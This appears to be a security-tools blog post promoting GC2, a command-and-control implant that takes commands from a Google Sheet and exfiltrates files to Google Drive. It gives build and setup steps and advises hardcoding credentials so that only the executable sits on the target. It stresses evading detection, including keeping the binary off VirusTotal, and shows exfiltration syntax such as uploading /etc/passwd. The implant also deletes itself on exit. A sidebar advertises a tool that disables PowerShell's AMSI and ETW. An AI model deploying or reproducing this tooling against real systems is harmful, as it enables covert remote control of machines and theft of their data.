Kali Linux

GC2 : A Command And Control Application That Allows An Attacker To Execute Commands On The Target Machine Using Google Sheet And Exfiltrate Data Using Google Drive

GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.

Why

This program has been developed in order to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, …) during Red Teaming activities.

Furthermore, the program will interact only with Google’s domains (*.google.com) to make detection more difficult.

PS: Please don’t upload the compiled binary on VirusTotal 🙂

Set up

Build executable

git clone https://github.com/looCiprian/GC2-sheet
cd GC2-sheet
go build gc2-sheet.go

  • Create a new google “service account”Create a new google “service account” using https://console.cloud.google.com/, create a .json key file for the service account
  • Enable Google Sheet API and Google Drive APIEnable Google Drive API https://developers.google.com/drive/api/v3/enable-driveapi and Google Sheet API https://developers.google.com/sheets/api/quickstart/go
  • Set up Google Sheet and Google DriveCreate a new Google Sheet and add the service account to the editor group of the spreadsheet (to add the service account use its email)

Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)

Start the C2

gc2-sheet –key <GCP service account credential file .JSON> –sheet <Google sheet ID> –drive <Google drive ID>

  • PS: you can also hardcode the parameters in the code, so you will upload only the executable on the target machine (look at comments in root.go and authentication.go)

Features

  • Command execution using Google Sheet as a console
  • Download files on the target using Google Drive
  • Data exfiltration using Google Drive
  • Exit

Command execution

The program will perform a request to the spreedsheet every 5 sec to check if there are some new commands. Commands must be inserted in the column “A”, and the output will be printed in the column “B”.

Data exfiltration file

Special commands are reserved to perform the upload and download to the target machine

From Target to Google Drive
upload;
Example:
upload;/etc/passwd

Download file

Special commands are reserved to perform the upload and download to the target machine

From Google Drive to Target
download;;
Example:
download;;/home/user/downloaded.txt

Exit

By sending the command exit, the program will delete itself from the target and kill its process

PS: From os documentation: If a symlink was used to start the process, depending on the operating system, the result might be the symlink or the path it pointed to. In this case the symlink is deleted.

WorkFlow

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

3 days ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

3 days ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

4 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

1 week ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago